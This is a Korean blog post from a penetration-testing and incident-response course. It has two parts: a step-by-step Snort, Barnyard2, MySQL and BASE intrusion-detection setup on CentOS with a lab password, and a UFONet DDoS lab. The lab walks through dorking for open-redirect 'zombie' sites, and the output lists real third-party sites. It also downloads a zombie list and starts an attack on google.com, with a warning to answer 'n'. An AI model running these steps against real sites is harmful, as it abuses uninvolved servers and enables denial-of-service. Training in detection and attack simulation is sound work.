(무선)

- Managed mode ) # airmon-ng stop wlan0

- Monitor mode ) # airmon-ng start wlan0

(유선)

- Non promisc mode ) # ifconfig eth0 -promisc

- promisc mode ) # ifconfig eth0 promisc

# ifconfig eth0 promisc

# ifconfig eth0

eth0 Link encap:Ethernet HWaddr 00:0C:29:8D:B0:53

inet addr:192.168.10.203 Bcast:192.168.10.255 Mask:255.255.255.0

inet6 addr: fe80::20c:29ff:fe8d:b053/64 Scope:Link

UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1

RX packets:433 errors:0 dropped:0 overruns:0 frame:0

TX packets:177 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:57168 (55.8 KiB) TX bytes:12204 (11.9 KiB)

# which snort

/usr/local/bin/snort

# snort -V

,,_ -*> Snort! <*-

o" )~ Version 2.9.7.5 GRE (Build 262)

'''' By Martin Roesch & The Snort Team: http://www.snort.org/contact#team

Using libpcap version 1.7.4

Using PCRE version: 8.37 2015-04-28

Using ZLIB version: 1.2.3

or

,,_ -*> Snort! <*-

o" )~ Version 2.9.8.2 GRE (Build 335)

'''' By Martin Roesch & The Snort Team: http://www.snort.org/contact#team

Using libpcap version 1.7.4

Using PCRE version: 8.38 2015-11-23

Using ZLIB version: 1.2.3

2. 참고

■ 참고 동영상

http://www.youtube.com/watch?v=DYBfCyd6cC0

● snort rules generate => tools

● snort(IDS) + preventing => IPS

● snort -> DB -> WEB => tools

2. snort rules & configuration

① 디렉토리 생성 및 파일 생성

# mkdir -p /etc/snort/rules

# mkdir /var/log/snort /var/log/barnyard2 /usr/local/lib/snort_dynamicrules

# useradd snort /* 사용자가 미리 존재할 수 있다. ids.example.com 설치시 사용자 추가 */

# chown -R snort:snort /etc/snort /var/log/snort /var/log/barnyard2

② setup snort rules

# cd /snort/snortrules

# tar xvzf snortrules-snapshot-*.tar.gz -C /etc/snort /* -C : change directory */

-> 출력 내용 생략

# cp -r /etc/snort/etc/* /etc/snort

# touch /etc/snort/rules/white_list.rules

# touch /etc/snort/rules/black_list.rules

# chown -R snort:snort /etc/snort

#

③ snort main file - snort.conf

# vi /etc/snort/snort.conf

[수정전]

45 ipvar HOME_NET any

104 var RULE_PATH ../rules

105 var SO_RULE_PATH ../so_rules

106 var PREPROC_RULE_PATH ../preproc_rules

109 var WHITE_LIST_PATH ../rules

110 var BLACK_LIST_PATH ../rules

519 # output alert_unified2: filename snort.alert, limit 128, nostamp

520 # output log_unified2: filename snort.log, limit 128, nostamp

[수정후]

45 ipvar HOME_NET 192.168.20.0/24

104 var RULE_PATH /etc/snort/rules

105 var SO_RULE_PATH /etc/snort/so_rules

106 var PREPROC_RULE_PATH /etc/snort/preproc_rules

109 var WHITE_LIST_PATH /etc/snort/rules

110 var BLACK_LIST_PATH /etc/snort/rules

519 output alert_unified2: filename snort.alert, limit 128, nostamp

520 output log_unified2: filename snort.log, limit 128, nostamp

-> 위와 같은 부분을 편집한다.

④ snort init script(EX: startup script)

# cp /snort/snort-*/rpm/snortd /etc/init.d/snortd

# chmod 755 /etc/init.d/snortd

# cat /etc/init.d/snortd | more

.....

# Source the local configuration file

. /etc/sysconfig/snort

.....

if [ "$CONF"X = "X" ]; then

CONF="-c /etc/snort/snort.conf"

else

CONF="-c $CONF"

fi

.....

if [ "$LOGDIR"X = "X" ]; then

LOGDIR=/var/log/snort

fi

.....

daemon /usr/sbin/snort $ALERTMODE $BINARY_LOG $NO_PACKET_LOG $DUMP_APP -D $PRINT_INTERFACE -i $i -u $USER -g $GROUP $CONF -l $LOGDIR/$i $PASS_FIRST $BPFFILE $BPF

done

.....

# cp /snort/snort-*/rpm/snort.sysconfig /etc/sysconfig/snort

# cat /etc/sysconfig/snort

-> 확인 정도만 한다.

# ln -s /usr/local/bin/snort /usr/sbin/snort

#

# chown -R snort:snort /var/log/snort

# chown snort:snort /usr/local/bin/snort

[참고] 새로운 서비스 등록 절차

# vi /etc/init.d/snortd

# chmod 700 /etc/init.d/snortd

# chown snort:snort /etc/init.d/snortd

# chkconfig --add snortd

# chkconfig --list snortd

snortd 0:off 1:off 2:on 3:on 4:on 5:on 6:off

# service snortd start

Starting snort: Spawning daemon child...

My daemon child 25853 lives...

Daemon parent exiting (0)

[ OK ]

# pgrep -lf snort

25853 /usr/sbin/snort -A fast -b -d -D -i eth0 -u snort -g snort -c /etc/snort/snort.conf -l /var/log/snort

-A alert-mode

Alert using the specified alert-mode. Valid alert modes include

fast, full, none, and unsock. Fast writes alerts to the default

"alert" file in a single-line, syslog style alert message. Full

writes the alert to the "alert" file with the full decoded

header as well as the alert message. None turns off alerting.

Unsock is an experimental mode that sends the alert information

out over a UNIX socket to another process that attaches to that

socket.

-b Log packets in a tcpdump(1) formatted file. All packets are

logged in their native binary state to a tcpdump formatted log

file named with the snort start timestamp and "snort.log". This

option results in much faster operation of the program

since it doesn’t have to spend time in the packet binary->text

converters. Snort can keep up pretty well with 100Mbps networks

in ’-b’ mode. To choose an alternate name for the binary log

file, use the ’-L’ switch.

-d Dump the application layer data when displaying packets in ver-

bose or packet logging mode.

-D Run Snort in daemon mode. Alerts are sent to

/var/log/snort/alert unless otherwise specified.

-i interface

Sniff packets on interface.

-u user

Change the user/UID Snort runs under to user after initialization.

-g group

Change the group/GID Snort runs under to group after initializa-

tion. This switch allows Snort to drop root privileges after

it’s initialization phase has completed as a security measure.

-c config-file

Use the rules located in file config-file.

-l log-dir

Set the output logging directory to log-dir. All plain text

alerts and packet logs go into this directory. If this option

is not specified, the default logging directory is set to

/var/log/snort.

# service snortd stop

Stopping snort: [ OK ]

# service snortd status

snort가 정지되었습니다

# cd /var/log/snort

# ls -l

-rw-r--r--. 1 root root 0 2016-06-03 12:52 alert

-rw-------. 1 snort snort 0 2016-06-03 12:54 snort_eth0.pid.lck

# chown -R snort:snort /var/log/snort

#

■ sniffer mode - 네트워크 트래픽을 실시간적으로 분석하는 경우

run-time options:

-v verbose

-d dump package payloads

-x dump entire package in hex

-a display arp packages

-e display link layer data

■ TCP/IP packet headers 출력

[TERM2] # ping 168.126.63.1

# snort -v (# snort -v -c /etc/snort/snort.conf -l /var/log/snort)

headers 와 data 부분 출력

# snort -dv (# snort -dv -c /etc/snort/snort.conf -l /var/log/snort)

data link layer headers 출력

# snort -dev (# snort -dev -c /etc/snort/snort.conf -l /var/log/snort)

■ log mode - 출력 내용을 로그에 저장

command line options

-l dump packages into log directory

-b log packages in binary (tcpdump) format

예제

# snort -dev -b -l /var/log/snort -c /etc/snort/snort.conf

# snort -dev -b -l /var/log/snort -h 192.168.20.0/24 -c /etc/snort/snort.conf

■ NIDS mode

# snort -d -h 192.168.20.0/24 -l /var/log/snort -c /etc/snort/snort.conf -A fast

-A fast : Fast alert mode

-A full

-A unsock

-A none

-A console(screen)

-A cmg(custom mode)

[예제]

fast mode

# snort -c /etc/snort/snort.conf -l /var/log/snort -A fast

full mode

# snort -c /etc/snort/snort.conf -l /var/log/snort -A full -D

checking log files

# ls -l /var/log/snort

# cat alert

# cat snort.log.1389675205

# tcpdump -nr /var/log/snort/snort.log.13897656

■ barnyard configuration

■ MySQL configuration

■ barnyard & snort startup

■ BASE installation

■ BASE configuration

[ snort ---> barnyard2 ---> BASE ---> MySQL ]

■ barnyard2 - github.com/firnsy/barnyard2

● a dedicated spooler for Snort's unified2 binary output format

● an output system for snort, it reads the binary logs from snort using the unified2 format.

● It will resend the information of this logs to a database backend

■ BASE: Basic Analysis and Security Engine

● provides a web front-end to query and analyze the alerts coming from Snort.

● The alerts will send to MySQL database, this feature is provided by barnyard2.

● http://base.professionallyevil.com/

① Barnyard installation

# vi /etc/hosts

..... (중략) .....

192.168.20.203 ids.example.com ids

192.168.10.203 nic2

# mkdir -p /snort

# cd /snort

# wget --no-check-certificate \

https://github.com/firnsy/barnyard2/archive/master.zip \

-O master.zip

-> 출력내용 생략

# unzip master.zip

-> 출력내용 생략

# cd barnyard2-master

# ls

autogen.sh COPYING etc m4 README rpm src

configure.ac doc LICENSE Makefile.am RELEASE.NOTES schemas tools

(자동) # ./autogen.sh /* update configuration files */

(수동) # autoconf -f -v -i -I ./m4

(주의) 선수 패키지 - 아래 패키지가 없는 경우에는 반드시 설치해야 한다.

autogen.sh 스크립트를 실행하기 전에 반드시 확인한다.

(RedHat 계열) # yum -y install autoconf libtool automake

(Debian 계열) # apt-get install autoconf libtool automake

# yum -y install autoconf libtool automake

# ./autogen.sh

Found libtoolize

libtoolize: putting auxiliary files in `.'.

libtoolize: copying file `./ltmain.sh'

libtoolize: putting macros in AC_CONFIG_MACRO_DIR, `m4'.

libtoolize: copying file `m4/libtool.m4'

libtoolize: copying file `m4/ltoptions.m4'

libtoolize: copying file `m4/ltsugar.m4'

libtoolize: copying file `m4/ltversion.m4'

libtoolize: copying file `m4/lt~obsolete.m4'

autoreconf: Entering directory `.'

autoreconf: configure.ac: not using Gettext

autoreconf: running: aclocal --force -I m4

autoreconf: configure.ac: tracing

autoreconf: running: libtoolize --copy --force

libtoolize: putting auxiliary files in `.'.

libtoolize: copying file `./ltmain.sh'

libtoolize: putting macros in AC_CONFIG_MACRO_DIR, `m4'.

libtoolize: copying file `m4/libtool.m4'

libtoolize: copying file `m4/ltoptions.m4'

libtoolize: copying file `m4/ltsugar.m4'

libtoolize: copying file `m4/ltversion.m4'

libtoolize: copying file `m4/lt~obsolete.m4'

autoreconf: running: /usr/bin/autoconf --force

autoreconf: running: /usr/bin/autoheader --force

autoreconf: running: automake --add-missing --copy --force-missing

configure.ac:11: installing `./config.guess'

configure.ac:11: installing `./config.sub'

configure.ac:8: installing `./install-sh'

configure.ac:8: installing `./missing'

autoreconf: Leaving directory `.'

You can now run "./configure" and then "make".

# ./configure --help | egrep '(mysql|lib)'

--with-mysql=DIR Support for MySQL

--with-mysql-libraries=DIR MySQL library directory

# yum -y install mysql mysql-devel

# ln -s /usr/lib64/mysql/libmysqlclient.so.16.0.0 /usr/lib/libmysqlclient.so.16.0.0

# ln -s /usr/lib64/mysql/libmysqlclient_r.so.16.0.0 /usr/lib/libmysqlclient_r.so.16.0.0

# cd /snort/barnyard2-master

# ./configure --with-mysql --with-mysql-libraries=/usr/lib64

# make

# make install

# cp /snort/barnyard2-master/etc/barnyard2.conf /etc/snort

# cp /snort/barnyard2-master/schemas/create_mysql /usr/local/src

# mkdir -p /var/log/barnyard2 /* 이전에 디렉토리를 생성했었다. */

# chown -R snort:snort /var/log/barnyard2

# cp /snort/snort-*/etc/gen-msg.map /etc/snort

② barnyard configuration

# vi /etc/snort/barnyard2.conf

[수정전]

227: output alert_fast: stdout

351: #output database: log, mysql, user=root password=test dbname=db host=localhost

[수정후]

227: output alert_fast

351: output database: log, mysql, user=snort password=snort dbname=snort host=localhost

-> 주석 제거 및 수정

③ Setup the MySQL Server

(주의) 반드시 Local에서 작업을 진행한다.

# yum -y install mysql-server

-> 출력 내용 생략

# chkconfig mysqld on

# service mysqld start

MySQL 데이타베이스 초기화 중: Installing MySQL system tables...

OK

Filling help tables...

OK

To start mysqld at boot time you have to copy

support-files/mysql.server to the right place for your system

PLEASE REMEMBER TO SET A PASSWORD FOR THE MySQL root USER !

To do so, start the server, then issue the following commands:

/usr/bin/mysqladmin -u root password 'new-password'

/usr/bin/mysqladmin -u root -h ids.example.com password 'new-password'

Alternatively you can run:

/usr/bin/mysql_secure_installation

which will also give you the option of removing the test

databases and anonymous user created by default. This is

strongly recommended for production servers.

See the manual for more instructions.

You can start the MySQL daemon with:

cd /usr ; /usr/bin/mysqld_safe &

You can test the MySQL daemon with mysql-test-run.pl

cd /usr/mysql-test ; perl mysql-test-run.pl

Please report any problems with the /usr/bin/mysqlbug script!

[ OK ]

mysqld (을)를 시작 중: [ OK ]

# mysql_secure_installation

NOTE: RUNNING ALL PARTS OF THIS SCRIPT IS RECOMMENDED FOR ALL MySQL

SERVERS IN PRODUCTION USE! PLEASE READ EACH STEP CAREFULLY!

In order to log into MySQL to secure it, we'll need the current

password for the root user. If you've just installed MySQL, and

you haven't set the root password yet, the password will be blank,

so you should just press enter here.

Enter current password for root (enter for none): <ENTER>

OK, successfully used password, moving on...

Setting the root password ensures that nobody can log into the MySQL

root user without the proper authorisation.

Set root password? [Y/n] Y

New password: (soldesk1.)

Re-enter new password: (soldesk1.)

Password updated successfully!

Reloading privilege tables..

... Success!

By default, a MySQL installation has an anonymous user, allowing anyone

to log into MySQL without having to have a user account created for

them. This is intended only for testing, and to make the installation

go a bit smoother. You should remove them before moving into a

production environment.

Remove anonymous users? [Y/n] Y

... Success!

Normally, root should only be allowed to connect from 'localhost'. This

ensures that someone cannot guess at the root password from the network.

Disallow root login remotely? [Y/n] Y

... Success!

By default, MySQL comes with a database named 'test' that anyone can

access. This is also intended only for testing, and should be removed

before moving into a production environment.

Remove test database and access to it? [Y/n] Y

- Dropping test database...

... Success!

- Removing privileges on test database...

... Success!

Reloading the privilege tables will ensure that all changes made so far

will take effect immediately.

Reload privilege tables now? [Y/n] Y

... Success!

Cleaning up...

All done! If you've completed all of the above steps, your MySQL

installation should now be secure.

Thanks for using MySQL!

# mysql -u root -p

Enter password: (soldesk1.)

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 21

Server version: 5.1.73 Source distribution

Oracle is a registered trademark of Oracle Corporation and/or its

affiliates. Other names may be trademarks of their respective

owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> create database snort;

Query OK, 1 row affected (0.00 sec)

mysql> grant all on snort.* to snort@localhost;

Query OK, 0 rows affected (0.00 sec)

/* mysql> grant CREATE,INSERT,SELECT,DELETE,UPDATE on snort.* to snort@localhost; */

mysql> set password for snort@localhost=password('snort');

Query OK, 0 rows affected (0.00 sec)

mysql> show databases;

+--------------------+

| Database |

+--------------------+

| information_schema |

| mysql |

| snort |

+--------------------+

3 rows in set (0.00 sec)

mysql> use snort;

Database changed

mysql> source /usr/local/src/create_mysql <- from barnyard2

..... (중략) .....

Query OK, 1 row affected (0.00 sec)

Query OK, 0 rows affected (0.01 sec)

Query OK, 1 row affected (0.00 sec)

mysql> show tables;

+------------------+

| Tables_in_snort |

+------------------+

| data |

| detail |

| encoding |

| event |

| icmphdr |

| iphdr |

| opt |

| reference |

| reference_system |

| schema |

| sensor |

| sig_class |

| sig_reference |

| signature |

| tcphdr |

| udphdr |

+------------------+

16 rows in set (0.00 sec)

mysql> flush privileges;

Query OK, 0 rows affected (0.00 sec)

mysql> exit

④ Start snort using the command

(자동) # service snortd restart

(수동) # snort -d -A full -u snort -g snort -c /etc/snort/snort.conf -i eth0 &

# service snortd restart

Stopping snort: [실패]

Starting snort: Spawning daemon child...

My daemon child 22470 lives...

Daemon parent exiting (0)

[ OK ]

# ls -l /var/log/snort

-> (주의) snort:snort 으로 안되어 있는 파일이 있다면 chown 명령어를 통해 설정을 바꿔야 한다.

# chown -R snort:snort /var/log/snort

[TERM2] 다른 터미널에서 수행

# barnyard2 -c /etc/snort/barnyard2.conf \

-d /var/log/snort -f snort.log \

-w /etc/snort/bylog.waldo \

-C /etc/snort/classification.config

Running in Continuous mode

--== Initializing Barnyard2 ==--

Initializing Input Plugins!

Initializing Output Plugins!

Parsing config file "/etc/snort/barnyard2.conf"

+[ Signature Suppress list ]+

----------------------------

+[No entry in Signature Suppress List]+

----------------------------

+[ Signature Suppress list ]+

Barnyard2 spooler: Event cache size set to [2048]

Log directory = /var/log/barnyard2

INFO database: Defaulting Reconnect/Transaction Error limit to 10

INFO database: Defaulting Reconnect sleep time to 5 second

[ClassificationPullDataStore()]: No Classification found in database ...

[SignaturePullDataStore()]: No signature found in database ...

[SystemPullDataStore()]: No System found in database ...

[ReferencePullDataStore()]: No Reference found in database ...

[SignatureReferencePullDataStore()]: No Reference found in database ...

database: compiled support for (mysql)

database: configured to use mysql

database: schema version = 107

database: host = localhost

database: user = snort

database: database name = snort

database: sensor name = ids.example.com:NULL

database: sensor id = 1

database: sensor cid = 1

database: data encoding = hex

database: detail level = full

database: ignore_bpf = no

database: using the "log" facility

--== Initialization Complete ==--

______ -*> Barnyard2 <*-

/ ,,_ \ Version 2.1.14 (Build 337)

|o" )~| By Ian Firns (SecurixLive): http://www.securixlive.com/

WARNING: Unable to open waldo file '/etc/snort/bylog.waldo' (No such file or directory)

Opened spool file '/var/log/snort/snort.log.1464866678'

Closing spool file '/var/log/snort/snort.log.1464866678'. Read 0 records

Opened spool file '/var/log/snort/snort.log.1464866810'

Closing spool file '/var/log/snort/snort.log.1464866810'. Read 0 records

Opened spool file '/var/log/snort/snort.log.1464870215'

Waiting for new data

-> 약간 실행 시간이 걸리기 때문에 기다린다.

-> 약 5분 ~ 10분정도

⑤ check mysql

# mysql -u root -p

Enter password: (soldesk1.)

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 12

Server version: 5.1.73 Source distribution

Oracle is a registered trademark of Oracle Corporation and/or its

affiliates. Other names may be trademarks of their respective

owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use snort;

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A

Database changed

mysql> select count(*) from event;

+----------+

| count(*) |

+----------+

| 0 | <---- barnyard2 프로그램이 /var/log/snort/<snort log> 파일을 읽어 들

+----------+ event count가 늘어난다.

1 row in set (0.00 sec)

mysql> exit

[참고]

https://www.youtube.com/watch?v=II80tzwEuFk

BASE Installation

① Prerequisite program installation

# yum install libxml2 \

php \

php-gd \

php-cli \

php-mysql \

php-pear \

php-pear-Log \

php-dba \

php-dbase \

php-odbc \

php-pear-Image-Graph

② php editing - BASE Log level

# vi /etc/php.ini

[수정전]

513: error_reporting = E_ALL & ~E_DEPRECATED

[수정후]

513: error_reporting = E_ALL & ~E_NOTICE

-> 내용 수정

# service httpd restart

httpd 를 정지 중: [실패]

httpd (을)를 시작 중: [ OK ]

# tail -f /var/log/httpd/error_log

-> 에러 메세지를 확인하고 적당한 설정을 변경한다.

-> <CTRL + C> 끊는다.

③ BASE and Adodb download

# cd /snort

# wget --no-check-certificate \

http://sourceforge.net/projects/secureideas/files/BASE/base-1.4.5/base-1.4.5.tar.gz

-> 출력 내용 생략

# tar xvzf base-1.4.5.tar.gz

-> 출력 내용 생략

# cp -r base-1.4.5 /var/www/html/base

# chown -R apache:apache /var/www/html/base

# chmod 777 /var/www/html/base

④ Adodb(a database abstraction library for PHP)

download http://sourceforge.net/projects/adodb/

# cd /snort

# wget --no-check-certificate http://sourceforge.net/projects/adodb/files/latest/download

-> 출력 내용 생략

# tar xvzf adodb-*.tar.gz

-> 출력 내용 생략

# mkdir /var/www/lib

# cp -r adodb5 /var/www/lib

⑤ BASE configuration

# firefox http://192.168.20.203/base &

Settings

Step 1 of 5

-> continue

Pick a Language : english

Path to ADODB : /var/www/lib/adodb5

-> continue

Step 2 of 5

Step 3 of 5

Database Name : snort

Database Host : localhost

Database User Name : root

Database Password : soldesk1.

-> continue

Admin User Name : soldesk

Password : soldesk1.

Full Name : soldesk

-> continue

Step 4 of 5	Step 4 of 5
-> Create BASE AG	-> Now continue to step 5 to login

Step 5 of 5

!!! Complete !!!

Blank Page

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160824 윈도우즈 서버 보안 (0)	2016.08.24
20160824 Snort on CentOS6.X (수정) (0)	2016.08.24
20160823 DoS, DDoS, SNORT (0)	2016.08.23
20160822 DoS, DDoS, SNORT (0)	2016.08.23
20160822 NAS(Network Attached Storage) (0)	2016.08.22

Posted by 22Hz

, |

20160823 DoS, DDoS, SNORT

모의해킹 침해대응 전문가 과정 / 2016. 8. 23. 20:43

[실습] ufsnet 사용한 DDoS Attack 시뮬레이션

■ 사용 시스템

- KaliLinux

■ 사용 프로그램

- ufonet

UFONET 동작원리	UFONET GUI 툴

Description

UFONet is a free software tool designed to test DDoS attacks against a target using 'Open Redirect' vectors on third party web applications like botnet.

See this links for more info:

- CWE-601:Open Redirect:

http://cwe.mitre.org/data/definitions/601.html

- OWASP:URL Redirector Abuse:

https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2

UFONet abuses OSI Layer 7-HTTP to create/manage 'zombies' and to conduct different attacks using; GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.

[Video] -> http://ufonet.03c8.net/ufonet/UFONet-v0.6.ogv

Features

● Auto-update

● Clean code (only needs python-pycurl)

● Documentation with examples

● Web/GUI Interface

● Proxy to connect to 'zombies' (ex: tor)

● Change HTTP Headers (User-Agent, Referer, Host...)

● Configure requests (Timeout, Retries, Delay...)

● Search for 'zombies' on google results (using a pattern or a list of dorks)

● Test 'Open Redirect' vulnerabilities on 'zombies'

● Download/Upload 'zombies' from Community

● Inspect a target (HTML objects sizes)

● Set a place to 'bit' on a target (ex: big file)

● Control number of rounds to attack

● Apply cache evasion techniques

● Supports GET/POST

● Multithreading

● Different search engines for dorking

● Web interface

● Geomapping / Visual data

● Order 'zombies' to attack you for benchmarking

● etc

(KaliLinux)

① ufonet 프로그램 다운로드

www.sourceforge.net 접속하여

-> "ufonet" 프로그램 검색

-> 파일이름: ufonet-v0.5b.zip

ufonet-v0.6.zip

-> 0.5b 버전과 0.6 버전이 GUI Web으로 설정하는 화면이 조금 틀리다.

-> 0.6 버전은 여러가지 기능이 추가되었다.

ufonet 프로그램 직접 다운로드 하는 사이트

- https://sourceforge.net/projects/ufonet/?source=directory

② ufonet 프로그램 압축 해제 및 디렉토리 확인

● /test1 디렉토리에 ufonet-v0.6.zip 파일을 다운로드 받은 상태이다.

# cd /test1

# unzip ufonet-v0.6.zip

-> 출력내용 생략

# ls

ufonet/ ufonet-v0.6.zip

# cd ufonet

# ls

README.md ufonet/

# cd ufonet

# ls

aliens.txt core/ docs/ dorks.txt server/ ufonet* zombies.txt

③ ufonet 사용법 확인

# ./ufonet

===========================================================================

888 888 8888888888 .d88888b. 888b 888 888

888 888 888 d88PY888b 8888b 888 888

888 888 888 888 888 88888b 888 888

888 888 8888888 888 888 888Y88b 888 .d88b. 888888

888 888 888 888 888 888 Y88b888 d8P Y8b 888

888 888 888 888 888 888 Y88888 88888888 888

Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.

'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888

UFONet - DDoS Botnet via Web Abuse - by psy

===========================================================================

# ./ufonet --help

Usage: UFONet.py [options]

UFONet - DDoS Botnet via Web Abuse - by psy

Options:

--version show program's version number and exit

-h, --help show this help message and exit

-v, --verbose active verbose on requests

--update check for latest stable version

--check-tor check to see if Tor is used properly

--force-yes set 'YES' to all questions

--disableisup disable external check of target's status

--gui run GUI (UFONet Web Interface)

*Configure Request(s)*:

--proxy=PROXY Use proxy server (tor: 'http://127.0.0.1:8118')

--user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED)

--referer=REFERER Use another HTTP Referer header (default SPOOFED)

--host=HOST Use another HTTP Host header (default NONE)

--xforw Set your HTTP X-Forwarded-For with random IP values

--xclient Set your HTTP X-Client-IP with random IP values

--timeout=TIMEOUT Select your timeout (default 10)

--retries=RETRIES Retries when the connection timeouts (default 1)

--threads=THREADS Maximum number of concurrent HTTP requests (default 5)

--delay=DELAY Delay in seconds between each HTTP request (default 0)

*Search for 'Zombies'*:

-s SEARCH Search from a 'dork' (ex: -s 'proxy.php?url=')

--sd=DORKS Search from a list of 'dorks' (ex: --sd 'dorks.txt')

--sn=NUM_RESULTS Set max number of results for engine (default 10)

--se=ENGINE Search engine to use for 'dorking' (default: duck)

--sa Search massively using all search engines

*Test Botnet*:

-t TEST Update 'zombies' status (ex: -t 'zombies.txt')

--attack-me Order 'zombies' to attack you (NAT required!)

*Community*:

--download-zombies Download 'zombies' from Community server: Turina

--upload-zombies Upload your 'zombies' to Community server: Turina

--blackhole Create a 'blackhole' to share your 'zombies'

--up-to=UPIP Upload your 'zombies' to a 'blackhole'

--down-from=DIP Download your 'zombies' from a 'blackhole'

*Research Target*:

-i INSPECT Search for biggest file (ex: -i 'http://target.com')

*Configure Attack(s)*:

--disable-aliens Disable 'aliens' web abuse of test services

--disable-isup Disable check status 'is target up?'

-r ROUNDS Set number of rounds (default: 1)

-b PLACE Set place to attack (ex: -b '/path/big.jpg')

-a TARGET Start Web DDoS attack (ex: -a 'http(s)://target.com')

④ google 검색 엔진을 통해 zombie PC를 검색

● 기본 검색 엔진은 duck 이다.(지정을 하지 않으면 duck 기본값)

● 지원되는 검색 엔진의 종류는 많다.
Search engines available:
-------------------------
+ duck
+ google
+ bing
+ yahoo
+ yandex
-------------------------

● 지원되는 종류를 --se 옵션 다음에 지정하여 사용하면 된다.

● Zomebie PC를 검색할 때 사용하는 Keyword는 많다.(ufonet/ufonet/dorks.txt 파일 참조)
----------------------------------------------
proxy.php?url=
check.cgi?url=
checklink?uri=
validator?uri=
redirect_uri=
redirect=
referer=
pageurl=
returnUrl=
goto=
redir=
openfile=
open=
page=
pagina=
return=
link=
?url=
?uri=
url=
----------------------------------------------

● 적당한 키워드를 사용한다.

# ./ufonet -s 'index.php?url=' --se google

===========================================================================

888 888 8888888888 .d88888b. 888b 888 888

888 888 888 d88P Y888b 8888b 888 888

888 888 888 888 888 88888b 888 888

888 888 8888888 888 888 888Y88b 888 .d88b. 888888

888 888 888 888 888 888 Y88b888 d8P Y8b 888

888 888 888 888 888 888 Y88888 88888888 888

Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.

'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888

UFONet - DDoS Botnet via Web Abuse - by psy

===========================================================================

Searching for 'zombies' using: google

======================

+Victim found: http://reprints.ygsgroup.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

+Victim found: http://daimi.au.dk/CPnets/proxy.php?url=

------------

+Victim found: http://business.louisville.edu/cob-it-blog/wp-content/plugins/google-document-embedder/proxy.php?url=

------------

+Victim found: http://www.icap2014.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

+Victim found: http://judicial.ronny.tw/proxy.php?url=

------------

+Victim found: http://2ch.io/img.theqoo.net/proxy.php?url=

------------

+Victim found: http://www.eurasiam.com/proxy.php?url=

------------

+Victim found: http://www.sltrib.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

======================

+Possible Zombies: 8

======================

Wanna check if they are valid zombies? (Y/n)

Y

Are 'they' alive? :-) (HEAD Check):

===================================

Trying: 8

---------------------

Zombie: judicial.ronny.tw

Status: Ok [200]

----------

Zombie: reprints.ygsgroup.com

Status: Ok [200]

----------

Zombie: www.icap2014.com

Status: Ok [200]

----------

Zombie: 2ch.io

Status: Ok [200]

----------

Zombie: www.sltrib.com

Status: Ok [200]

----------

Zombie: www.eurasiam.com

Status: Ok [200]

----------

Zombie: daimi.au.dk

Status: Ok [200]

----------

Zombie: business.louisville.edu http://business.louisville.edu/cob-it-blog/wp-content/plugins/google-document-embedder/proxy.php?url=

Status: Not Allowed [0]

----------

==================

OK: 7 Fail: 1

==================

======================

Checking for payloads:

======================

Trying: 7

---------------------

Vector: http://2ch.io/img.theqoo.net/proxy.php?url=

Status: Not ready...

----------

Vector: http://judicial.ronny.tw/proxy.php?url=

Status: Not ready...

----------

Vector: http://reprints.ygsgroup.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

Status: Not ready...

----------

Vector: http://www.icap2014.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

Status: Waiting your orders...

----------

Vector: http://www.eurasiam.com/proxy.php?url=

Status: Waiting your orders...

----------

Vector: http://daimi.au.dk/CPnets/proxy.php?url=

Status: Waiting your orders...

----------

Vector: http://www.sltrib.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

Status: Not ready...

----------

==================

OK: 3 Fail: 4

==================

Army of 'zombies'

==================

------------------

Total Army: 3

------------------

Wanna update your army (Y/n)Y

-------------------------

[Info] - Botnet updated! ;-)

⑤ community server(Turina)로 부터 zombies 목록 다운로드

# ./ufonet --download-zombies

===========================================================================

888 888 8888888888 .d88888b. 888b 888 888

888 888 888 d88P Y888b 8888b 888 888

888 888 888 888 888 88888b 888 888

888 888 8888888 888 888 888Y88b 888 .d88b. 888888

888 888 888 888 888 888 Y88b888 d8P Y8b 888

888 888 888 888 888 888 Y88888 88888888 888

Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.

'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888

UFONet - DDoS Botnet via Web Abuse - by psy

===========================================================================

Downloading list of 'zombies' from server ...

======================

Trying 'blackhole': 176.28.23.46

Vortex: IS READY!

------------

[Info] - Congratulations!. Total of 'zombies' downloaded: 1716

------------

Wanna merge ONLY new 'zombies' to your army (Y/n) Y

-------------------------

[Info] - Botnet updated! ;-)

⑥ ufonet CLI 명령어를 통해 공격 작업을 수행

# ./ufonet -a http://www.google.com

===========================================================================

888 888 8888888888 .d88888b. 888b 888 888

888 888 888 d88P Y888b 8888b 888 888

888 888 888 888 888 88888b 888 888

888 888 8888888 888 888 888Y88b 888 .d88b. 888888

888 888 888 888 888 888 Y88b888 d8P Y8b 888

888 888 888 888 888 888 Y88888 88888888 888

Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.

'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888

UFONet - DDoS Botnet via Web Abuse - by psy

===========================================================================

Attacking: http://www.google.com

=======================================================

=====================

Round: 'Is target up?'

=====================

[Info] From here: YES

---------------------

[Info] From exterior: YES

---------------------

[Info] Your target looks ONLINE!. Wanna start a DDoS attack? (y/N)

y <---- (주의) 실습에서는 'y' 선택하면 안된다. 반드시 'n' 선택한다.

==========================================

Starting round: 1 of 1

==========================================

